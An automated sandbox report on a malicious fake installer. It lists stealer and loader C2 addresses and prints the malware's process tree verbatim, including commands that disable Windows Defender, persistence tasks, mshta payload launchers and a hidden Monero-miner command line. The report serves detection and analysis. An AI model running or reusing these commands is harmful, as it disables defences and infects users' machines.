Resubmissions

01-11-2021 20:09

211101-yw5kbaafg5 10

01-11-2021 07:13

211101-h2lrdsdhhj 10

01-11-2021 06:40

211101-hfpk6adhfj 10

31-10-2021 18:27

211031-w3r7fsdafj 10

31-10-2021 14:10

211031-rgstmscghm 10

31-10-2021 08:02

211031-jxchlacefm 10

31-10-2021 06:36

211031-hczxqacddp 10

31-10-2021 06:23

211031-g5wv4affb3 10

Analysis

  • max time kernel
    4285s
  • max time network
    10748s
  • platform
    windows10_x64
  • resource
    win10-ja-20211014
  • submitted
    01-11-2021 06:40

General

  • Target

    setup_x86_x64_install.exe

  • Size

    4.5MB

  • MD5

    3da25ccfa9c258e3ae26854391531c7b

  • SHA1

    1ed5613b0ad8ab4c47f07e52199a4edd27be40e6

  • SHA256

    62be0ca52ea9ebc4c577d597b919f6b90cebdcc2179d7d482a04bf5731eec720

  • SHA512

    defed576df3d8325259884b485a0dc7cd673c47028e77f189255e27dca312a0befdc8dc84106cc3103a3027e67a835fad899f9361076a64831db144354a4618c

Malware Config

Extracted

Family

redline

Botnet

srtupdate33

C2

135.181.129.119:4805

Extracted

Family

smokeloader

Version

2020

C2

http://brandyjaggers.com/upload/

http://andbal.com/upload/

http://alotofquotes.com/upload/

http://szpnc.cn/upload/

http://uggeboots.com/upload/

http://100klv.com/upload/

http://rapmusic.at/upload/

rc4.i32
rc4.i32

Signatures

  • Formbook

    Formbook is a data stealing malware which is capable of stealing data.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 2 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 2 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 3 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Turns off Windows Defender SpyNet reporting 2 TTPs
  • UAC bypass 3 TTPs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Windows security bypass 2 TTPs
  • XenArmor Suite

    XenArmor is as suite of password recovery tools for various application.

  • suricata: ET MALWARE ClipBanker Variant Activity (POST)

    suricata: ET MALWARE ClipBanker Variant Activity (POST)

  • suricata: ET MALWARE FormBook CnC Checkin (GET)

    suricata: ET MALWARE FormBook CnC Checkin (GET)

  • suricata: ET MALWARE FormBook CnC Checkin (POST) M2

    suricata: ET MALWARE FormBook CnC Checkin (POST) M2

  • suricata: ET MALWARE GCleaner Downloader Activity M5

    suricata: ET MALWARE GCleaner Downloader Activity M5

  • suricata: ET MALWARE Known Sinkhole Response Header

    suricata: ET MALWARE Known Sinkhole Response Header

  • suricata: ET MALWARE Sharik/Smoke CnC Beacon 11

    suricata: ET MALWARE Sharik/Smoke CnC Beacon 11

  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

    suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

  • suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

    suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

  • suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

    suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

  • suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil

    suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil

  • suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin

    suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin

  • suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2

    suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • ASPack v2.12-2.42 7 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Adds policy Run key to start application 2 TTPs 2 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Executes dropped EXE 64 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Checks BIOS information in registry 2 TTPs 20 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 3 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 1 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Windows security modification 2 TTPs 12 IoCs
  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 8 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 42 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 14 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 18 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 28 IoCs
  • Suspicious use of SetThreadContext 29 IoCs
  • Drops file in Program Files directory 20 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 21 IoCs
  • Checks SCSI registry key(s) 3 TTPs 54 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 8 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 9 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 2 IoCs
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Kills process with taskkill 9 IoCs
  • Modifies Internet Explorer settings 1 TTPs 15 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 23 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Runs net.exe
  • Script User-Agent 2 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 3 IoCs
  • Suspicious behavior: MapViewOfSection 48 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 8 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 2 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\system32\lsass.exe
    C:\Windows\system32\lsass.exe
    1⤵
      PID:640
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}
        2⤵
        • Modifies data under HKEY_USERS
        PID:1384
        • C:\Windows\System32\Conhost.exe
          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          3⤵
            PID:5552
          • C:\Windows\SysWOW64\sc.exe
            "C:\Windows\system32\sc.exe" qc windefend
            3⤵
              PID:3708
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
              3⤵
                PID:6260
              • C:\Windows\SysWOW64\whoami.exe
                "C:\Windows\system32\whoami.exe" /groups
                3⤵
                  PID:1552
                • C:\Windows\SysWOW64\net1.exe
                  "C:\Windows\system32\net1.exe" stop windefend
                  3⤵
                    PID:6384
                  • C:\Windows\SysWOW64\sc.exe
                    "C:\Windows\system32\sc.exe" config windefend depend= RpcSs-TOGGLE
                    3⤵
                      PID:5472
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    powershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}
                    2⤵
                    • Modifies data under HKEY_USERS
                    PID:2424
                    • C:\Windows\SysWOW64\sc.exe
                      "C:\Windows\system32\sc.exe" qc windefend
                      3⤵
                        PID:7744
                      • C:\Windows\SysWOW64\cmd.exe
                        "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
                        3⤵
                          PID:4012
                        • C:\Windows\SysWOW64\whoami.exe
                          "C:\Windows\system32\whoami.exe" /groups
                          3⤵
                            PID:8392
                          • C:\Windows\SysWOW64\net1.exe
                            "C:\Windows\system32\net1.exe" stop windefend
                            3⤵
                              PID:3580
                            • C:\Windows\SysWOW64\sc.exe
                              "C:\Windows\system32\sc.exe" config windefend depend= RpcSs-TOGGLE
                              3⤵
                                PID:976
                          • c:\windows\system32\svchost.exe
                            c:\windows\system32\svchost.exe -k netsvcs -s BITS
                            1⤵
                            • Suspicious use of SetThreadContext
                            • Modifies registry class
                            PID:5060
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k SystemNetworkService
                              2⤵
                              • Drops file in System32 directory
                              • Checks processor information in registry
                              • Modifies data under HKEY_USERS
                              • Modifies registry class
                              PID:8792
                          • C:\Windows\Explorer.EXE
                            C:\Windows\Explorer.EXE
                            1⤵
                            • Drops file in Program Files directory
                            • Modifies registry class
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious behavior: GetForegroundWindowSpam
                            • Suspicious behavior: MapViewOfSection
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of FindShellTrayWindow
                            PID:2604
                            • C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
                              "C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
                              2⤵
                              • Suspicious use of WriteProcessMemory
                              PID:3324
                              • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                                "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                                3⤵
                                • Executes dropped EXE
                                • Suspicious use of WriteProcessMemory
                                PID:3344
                                • C:\Users\Admin\AppData\Local\Temp\7zS01DF1F46\setup_install.exe
                                  "C:\Users\Admin\AppData\Local\Temp\7zS01DF1F46\setup_install.exe"
                                  4⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  • Suspicious use of WriteProcessMemory
                                  PID:684
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
                                    5⤵
                                    • Suspicious use of WriteProcessMemory
                                    PID:1836
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
                                      6⤵
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:2892
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
                                    5⤵
                                    • Suspicious use of WriteProcessMemory
                                    PID:1896
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
                                      6⤵
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:2796
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /c Sun03d477f1a31.exe
                                    5⤵
                                      PID:2228
                                      • C:\Users\Admin\AppData\Local\Temp\7zS01DF1F46\Sun03d477f1a31.exe
                                        Sun03d477f1a31.exe
                                        6⤵
                                        • Executes dropped EXE
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:4312
                                        • C:\Windows\SysWOW64\cmd.exe
                                          cmd.exe /c taskkill /f /im chrome.exe
                                          7⤵
                                            PID:2320
                                            • C:\Windows\SysWOW64\taskkill.exe
                                              taskkill /f /im chrome.exe
                                              8⤵
                                              • Kills process with taskkill
                                              PID:8848
                                      • C:\Windows\SysWOW64\cmd.exe
                                        C:\Windows\system32\cmd.exe /c Sun033e271e0ce96c08.exe /mixone
                                        5⤵
                                        • Suspicious use of WriteProcessMemory
                                        PID:2396
                                        • C:\Users\Admin\AppData\Local\Temp\7zS01DF1F46\Sun033e271e0ce96c08.exe
                                          Sun033e271e0ce96c08.exe /mixone
                                          6⤵
                                          • Executes dropped EXE
                                          PID:4656
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4656 -s 660
                                            7⤵
                                            • Program crash
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:1632
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4656 -s 680
                                            7⤵
                                            • Program crash
                                            PID:3936
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4656 -s 684
                                            7⤵
                                            • Program crash
                                            PID:3208
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4656 -s 716
                                            7⤵
                                            • Program crash
                                            PID:5068
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4656 -s 904
                                            7⤵
                                            • Program crash
                                            PID:6128
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4656 -s 968
                                            7⤵
                                            • Program crash
                                            PID:2500
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4656 -s 1112
                                            7⤵
                                            • Suspicious use of NtCreateProcessExOtherParentProcess
                                            • Program crash
                                            PID:2076
                                      • C:\Windows\SysWOW64\cmd.exe
                                        C:\Windows\system32\cmd.exe /c Sun039750b00c.exe
                                        5⤵
                                        • Suspicious use of WriteProcessMemory
                                        PID:2524
                                        • C:\Users\Admin\AppData\Local\Temp\7zS01DF1F46\Sun039750b00c.exe
                                          Sun039750b00c.exe
                                          6⤵
                                          • Executes dropped EXE
                                          • Checks whether UAC is enabled
                                          PID:4624
                                      • C:\Windows\SysWOW64\cmd.exe
                                        C:\Windows\system32\cmd.exe /c Sun03f0dc4460bc9.exe
                                        5⤵
                                        • Suspicious use of WriteProcessMemory
                                        PID:2560
                                        • C:\Users\Admin\AppData\Local\Temp\7zS01DF1F46\Sun03f0dc4460bc9.exe
                                          Sun03f0dc4460bc9.exe
                                          6⤵
                                          • Executes dropped EXE
                                          • Suspicious use of SetThreadContext
                                          PID:4632
                                          • C:\Users\Admin\AppData\Local\Temp\7zS01DF1F46\Sun03f0dc4460bc9.exe
                                            C:\Users\Admin\AppData\Local\Temp\7zS01DF1F46\Sun03f0dc4460bc9.exe
                                            7⤵
                                            • Executes dropped EXE
                                            PID:3048
                                      • C:\Windows\SysWOW64\cmd.exe
                                        C:\Windows\system32\cmd.exe /c Sun0397381f1f458e.exe
                                        5⤵
                                          PID:2900
                                          • C:\Users\Admin\AppData\Local\Temp\7zS01DF1F46\Sun0397381f1f458e.exe
                                            Sun0397381f1f458e.exe
                                            6⤵
                                            • Executes dropped EXE
                                            PID:2332
                                            • C:\Users\Admin\AppData\Local\Temp\7zS01DF1F46\Sun0397381f1f458e.exe
                                              "C:\Users\Admin\AppData\Local\Temp\7zS01DF1F46\Sun0397381f1f458e.exe" -u
                                              7⤵
                                              • Executes dropped EXE
                                              PID:1680
                                        • C:\Windows\SysWOW64\cmd.exe
                                          C:\Windows\system32\cmd.exe /c Sun0324aba28588c0.exe
                                          5⤵
                                            PID:3884
                                            • C:\Users\Admin\AppData\Local\Temp\7zS01DF1F46\Sun0324aba28588c0.exe
                                              Sun0324aba28588c0.exe
                                              6⤵
                                              • Executes dropped EXE
                                              PID:2580
                                          • C:\Windows\SysWOW64\cmd.exe
                                            C:\Windows\system32\cmd.exe /c Sun03e4aeb7e43a1c.exe
                                            5⤵
                                              PID:2792
                                              • C:\Users\Admin\AppData\Local\Temp\7zS01DF1F46\Sun03e4aeb7e43a1c.exe
                                                Sun03e4aeb7e43a1c.exe
                                                6⤵
                                                • Executes dropped EXE
                                                PID:4296
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\1214377044.exe"
                                                  7⤵
                                                    PID:4976
                                                    • C:\Users\Admin\AppData\Local\Temp\1214377044.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\1214377044.exe"
                                                      8⤵
                                                      • Executes dropped EXE
                                                      • Suspicious use of SetThreadContext
                                                      PID:2288
                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                        #cmd
                                                        9⤵
                                                        • Checks processor information in registry
                                                        PID:5168
                                                        • C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe
                                                          "C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe"
                                                          10⤵
                                                            PID:8172
                                                          • C:\Users\Admin\AppData\Roaming\League1.exe
                                                            "C:\Users\Admin\AppData\Roaming\League1.exe"
                                                            10⤵
                                                              PID:7052
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\3065109252.exe"
                                                        7⤵
                                                          PID:3672
                                                          • C:\Users\Admin\AppData\Local\Temp\3065109252.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\3065109252.exe"
                                                            8⤵
                                                            • Executes dropped EXE
                                                            PID:6084
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" /c taskkill /im "Sun03e4aeb7e43a1c.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS01DF1F46\Sun03e4aeb7e43a1c.exe" & exit
                                                          7⤵
                                                            PID:8388
                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                              taskkill /im "Sun03e4aeb7e43a1c.exe" /f
                                                              8⤵
                                                              • Kills process with taskkill
                                                              PID:4736
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c Sun0351a0558292.exe
                                                        5⤵
                                                          PID:4936
                                                          • C:\Users\Admin\AppData\Local\Temp\7zS01DF1F46\Sun0351a0558292.exe
                                                            Sun0351a0558292.exe
                                                            6⤵
                                                            • Executes dropped EXE
                                                            PID:5040
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c Sun03ea09aa5c9686e5.exe
                                                          5⤵
                                                            PID:4620
                                                            • C:\Users\Admin\AppData\Local\Temp\7zS01DF1F46\Sun03ea09aa5c9686e5.exe
                                                              Sun03ea09aa5c9686e5.exe
                                                              6⤵
                                                              • Executes dropped EXE
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:3572
                                                              • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                                7⤵
                                                                • Executes dropped EXE
                                                                PID:3324
                                                                • C:\Users\Admin\AppData\Local\Temp\Chrome5.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"
                                                                  8⤵
                                                                    PID:4732
                                                                    • C:\Windows\System32\conhost.exe
                                                                      "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"
                                                                      9⤵
                                                                        PID:6004
                                                                        • C:\Windows\System32\cmd.exe
                                                                          "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"
                                                                          10⤵
                                                                            PID:7440
                                                                            • C:\Windows\system32\schtasks.exe
                                                                              schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"
                                                                              11⤵
                                                                              • Creates scheduled task(s)
                                                                              PID:7708
                                                                          • C:\Windows\System32\cmd.exe
                                                                            "cmd" cmd /c "C:\Users\Admin\AppData\Roaming\services64.exe"
                                                                            10⤵
                                                                              PID:6660
                                                                              • C:\Users\Admin\AppData\Roaming\services64.exe
                                                                                C:\Users\Admin\AppData\Roaming\services64.exe
                                                                                11⤵
                                                                                  PID:6496
                                                                                  • C:\Windows\System32\conhost.exe
                                                                                    "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\services64.exe"
                                                                                    12⤵
                                                                                    • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                    • Suspicious use of SetThreadContext
                                                                                    PID:8356
                                                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                                                      "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                                                                      13⤵
                                                                                        PID:7368
                                                                                        • C:\Windows\System32\conhost.exe
                                                                                          "C:\Windows\System32\conhost.exe" "/sihost64"
                                                                                          14⤵
                                                                                            PID:4048
                                                                                        • C:\Windows\explorer.exe
                                                                                          C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.udda/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6OAdluV/h8Wx+uVST9CwRTBBZDSizq+6yEkb73lzV2SG" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=60 --tls --cinit-stealth
                                                                                          13⤵
                                                                                            PID:1476
                                                                                • C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"
                                                                                  8⤵
                                                                                  • Executes dropped EXE
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  PID:4536
                                                                                  • C:\Users\Admin\AppData\Roaming\2798611.exe
                                                                                    "C:\Users\Admin\AppData\Roaming\2798611.exe"
                                                                                    9⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:5372
                                                                                  • C:\Users\Admin\AppData\Roaming\8544033.exe
                                                                                    "C:\Users\Admin\AppData\Roaming\8544033.exe"
                                                                                    9⤵
                                                                                    • Executes dropped EXE
                                                                                    • Checks BIOS information in registry
                                                                                    • Checks whether UAC is enabled
                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                    PID:3764
                                                                                  • C:\Users\Admin\AppData\Roaming\1996915.exe
                                                                                    "C:\Users\Admin\AppData\Roaming\1996915.exe"
                                                                                    9⤵
                                                                                    • Executes dropped EXE
                                                                                    • Checks BIOS information in registry
                                                                                    • Checks whether UAC is enabled
                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                    PID:1124
                                                                                  • C:\Users\Admin\AppData\Roaming\3566272.exe
                                                                                    "C:\Users\Admin\AppData\Roaming\3566272.exe"
                                                                                    9⤵
                                                                                    • Checks whether UAC is enabled
                                                                                    PID:1908
                                                                                    • C:\Windows\SysWOW64\mshta.exe
                                                                                      "C:\Windows\System32\mshta.exe" VBScRIPt: cLoSE ( cReateoBJECT ( "WSCRiPT.SHelL" ). RuN ("C:\Windows\system32\cmd.exe /R copY /Y ""C:\Users\Admin\AppData\Roaming\3566272.exe"" ..\ozR8x.ExE &&STArt ..\ozR8X.Exe /PrWIGG7qbcjwuF1awT~BmZfq & If """" == """" for %T IN ( ""C:\Users\Admin\AppData\Roaming\3566272.exe"" ) do taskkill -iM ""%~nxT"" -f" , 0, trUe ) )
                                                                                      10⤵
                                                                                      • Checks whether UAC is enabled
                                                                                      • Modifies Internet Explorer settings
                                                                                      PID:3412
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        "C:\Windows\system32\cmd.exe" /R copY /Y "C:\Users\Admin\AppData\Roaming\3566272.exe" ..\ozR8x.ExE &&STArt ..\ozR8X.Exe /PrWIGG7qbcjwuF1awT~BmZfq & If "" =="" for %T IN ( "C:\Users\Admin\AppData\Roaming\3566272.exe" ) do taskkill -iM "%~nxT" -f
                                                                                        11⤵
                                                                                          PID:1792
                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                            taskkill -iM "3566272.exe" -f
                                                                                            12⤵
                                                                                            • Kills process with taskkill
                                                                                            PID:7616
                                                                                    • C:\Users\Admin\AppData\Roaming\4507324.exe
                                                                                      "C:\Users\Admin\AppData\Roaming\4507324.exe"
                                                                                      9⤵
                                                                                        PID:5528
                                                                                      • C:\Users\Admin\AppData\Roaming\5791509.exe
                                                                                        "C:\Users\Admin\AppData\Roaming\5791509.exe"
                                                                                        9⤵
                                                                                        • Adds Run key to start application
                                                                                        PID:3136
                                                                                        • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                                                                          "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                                                                          10⤵
                                                                                            PID:6604
                                                                                      • C:\Users\Admin\AppData\Local\Temp\inst1.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\inst1.exe"
                                                                                        8⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:5000
                                                                                      • C:\Users\Admin\AppData\Local\Temp\Soft1WW01.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\Soft1WW01.exe"
                                                                                        8⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:3288
                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3288 -s 1560
                                                                                          9⤵
                                                                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                          • Program crash
                                                                                          PID:7184
                                                                                      • C:\Users\Admin\AppData\Local\Temp\5.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\5.exe"
                                                                                        8⤵
                                                                                        • Executes dropped EXE
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        PID:2464
                                                                                      • C:\Users\Admin\AppData\Local\Temp\4.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\4.exe"
                                                                                        8⤵
                                                                                        • Executes dropped EXE
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        PID:1292
                                                                                        • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                                                          9⤵
                                                                                          • Checks whether UAC is enabled
                                                                                          PID:592
                                                                                      • C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"
                                                                                        8⤵
                                                                                          PID:1868
                                                                                          • C:\Windows\SysWOW64\mshta.exe
                                                                                            "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If """" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )
                                                                                            9⤵
                                                                                            • Checks whether UAC is enabled
                                                                                            • Checks SCSI registry key(s)
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                            PID:2580
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "" == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ) do taskkill -f -iM "%~NxM"
